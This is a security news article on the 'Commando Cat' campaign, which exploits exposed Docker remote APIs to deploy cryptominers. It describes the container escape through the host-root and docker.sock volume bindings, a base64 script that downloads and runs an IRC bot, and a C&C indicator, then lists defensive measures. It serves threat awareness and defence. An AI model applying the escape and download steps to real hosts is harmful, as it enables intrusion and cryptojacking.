A campaign dubbed “Commando Cat” has been observed exploiting exposed Docker remote API servers to deploy cryptocurrency miners.
This campaign, active since the beginning of 2024, initiates its attacks using the publicly available Commando project.
The attackers use the cmd.cat/chattr Docker image container to retrieve payloads from their command-and-control (C&C) infrastructure, posing a significant threat to Docker environments.
Initial Access
According to the Trendmicro report, the attack begins with deploying a seemingly benign Docker image named cmd.cat/chattr.
Once deployed, the malicious actor creates a Docker container based on this image and uses chroot to break out of the container, gaining access to the host operating system. Tools like curl and wget are then used to download the malicious binary onto the host.
Attack Sequence
1. Probing the Docker Remote API Server
The attack sequence starts with a ping to the Docker Remote API server, which is the pivotal starting point for the ensuing chain of actions.
2. Creating the Container Using cmd.cat/chattr Image
Upon confirming the server’s status as “OK,” the attacker instantiates a container using the cmd.cat/chattr image.
Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN : Start your Analysis
In this step, the attacker employs chroot and volume binding to escape the container.
The binding /:/hs mounts the host’s root directory into the container’s /hs directory, granting the attacker unrestricted access to the host file system.
Additionally, binding the Docker socket (/var/run/docker.sock:/var/run/docker.sock) allows the container direct access to the Docker daemon on the host.
3. Image Creation in Absence
If the above request returns a “No such image” response, the attacker will pull the chattr Docker image from the cmd.cat repository.
4. Container Deployment
With the image in place, the attacker creates a Docker container, effectively executing a replica of the previous step.
The malicious actor executes a base64-encoded string during this process, translating to a shell script.
The script checks for a file named “z” in the directory /usr/sbin/. If the file does not exist, the script downloads and executes the malicious binary from its file server, potentially ZiggyStarTux, an open-source IRC bot based on the Kaiten malware.
The deployed malware attempts to connect to its C&C server at 45[.]9[.]148[.]193 on port 1219.
The initial network traffic shows the initial IRC communication, which can be used to monitor the presence of this malware in the network.
To protect development environments from attacks targeting containers and hosts, the following best practices are recommended:
- Proper Configuration: Containers and APIs should always be properly configured to minimize the chance of exploitative attacks. Docker provides specific guidelines to strengthen security.
- Use Official Images: Organizations should use only official or certified images to ensure that only trusted content is run within the environment.
- Avoid Root Privileges: Running containers should not be done with root privileges but rather as application users.
- Restrict Access: Containers should be configured so that access is granted only to trusted sources, such as the internal network.
- Adhere to Best Practices: Docker provides a comprehensive list of best practices and built-in security features to improve the security of cloud environments.
- Regular Security Audits: Security audits should be performed regularly to check for suspicious containers and images.
The Commando Cat attack campaign highlights the threat posed by abusing exposed Docker remote API servers.
By exploiting Docker configurations and leveraging open-source tools like cmd.cat, attackers can gain initial access and deploy malicious binaries while evading conventional security measures.
The campaign’s use of Docker images to propagate cryptojacking scripts underscores the importance of implementing robust container security practices.
Organizations must remain vigilant and adopt stringent security measures to protect their Docker environments from sophisticated attacks.
Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo